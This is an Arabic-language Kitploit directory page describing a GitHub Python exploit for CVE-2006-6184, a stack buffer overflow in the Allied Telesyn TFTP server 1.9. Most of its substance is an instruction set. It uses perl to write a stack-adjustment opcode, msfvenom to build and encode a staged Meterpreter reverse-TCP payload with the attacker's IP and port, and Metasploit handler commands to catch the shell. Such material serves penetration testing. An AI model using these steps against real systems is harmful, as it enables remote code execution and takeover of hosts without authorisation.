Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2006-6184 — هذا استغلال مستقل مبني على Python لـ CVE-2006-6184. يقوم هذا الاستغلال بتشغيل تجاوز سعة المخزن المؤقت القائم على المكدس في خادم Allied Telesyn TFTP (AT-TFTP) الإصدار 1.9، وربما الإصدارات السابقة، مما يسمح للمهاجمين عن بُعد بالتسبب في رفض الخدمة أو تنفيذ تعليمات برمجية عشوائية. | Kitploit
أدوات/GitHubGitHub/shauntdergrigorian/cve-2006-6184
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأداة الوصول عن بعداستغلال الملفات الثنائية
GitHubshauntdergrigorian/cve-2006-6184

cve-2006-6184

هذا استغلال مستقل مبني على Python لـ CVE-2006-6184. يقوم هذا الاستغلال بتشغيل تجاوز سعة المخزن المؤقت القائم على المكدس في خادم Allied Telesyn TFTP (AT-TFTP) الإصدار 1.9، وربما الإصدارات السابقة، مما يسمح للمهاجمين عن بُعد بالتسبب في رفض الخدمة أو تنفيذ تعليمات برمجية عشوائية.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
1171منذ 5 سنواتلم تتم المراجعة بعد
مشاركة

CVE-2006-6184

هذا استغلال مستقل مبني على بايثون لـ CVE-2006-6184. يقوم هذا الاستغلال بتفعيل تجاوز سعة المخزن المؤقت القائم على المكدس في خادم Allied Telesyn TFTP (AT-TFTP) الإصدار 1.9، وربما الإصدارات السابقة، مما يسمح للمهاجمين عن بُعد بالتسبب في رفض الخدمة أو تنفيذ كود عشوائي.

التعليمات (محدثة لعام 2020)

يجب تخصيص الحمولة (payload) لتتضمن عنوان IP الخاص بك ومنفذ الاستماع، لذا ستحتاج إلى توليدها يدويًا. للقيام بذلك، اتبع الخطوات التالية:

1.) أدخل الأمر التالي لإنشاء ملف سداسي عشري للمقدار الذي يجب طرحه من مؤشر المكدس (3500):

root@kitploit:~
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj

2.) بعد ذلك، استخدم الأمر التالي لإنشاء حمولة متروبريتر (meterpreter) المرحلية:

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload

3.) ثم، ادمج الملفين اللذين أنشأتهما للتو.

root@kitploit:~
cat stackadj payload > shellcode

4.) أخيرًا، لنقم بإزالة الأحرف السيئة.

root@kitploit:~
msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -f python

أدخل المخرجات كقيمة للمتغير "payload". قد تحتاج إلى تشغيل هذا الاستغلال عدة مرات حتى يعمل.

مستمع Metasploit

  1. use exploit/multi/handler
  2. set PAYLOAD windows/meterpreter/reverse_nonx_tcp
  3. set ExitOnSession false
  4. set AutoRunScript post/windows/manage/migrate
  5. exploit -j
تنزيل الأداة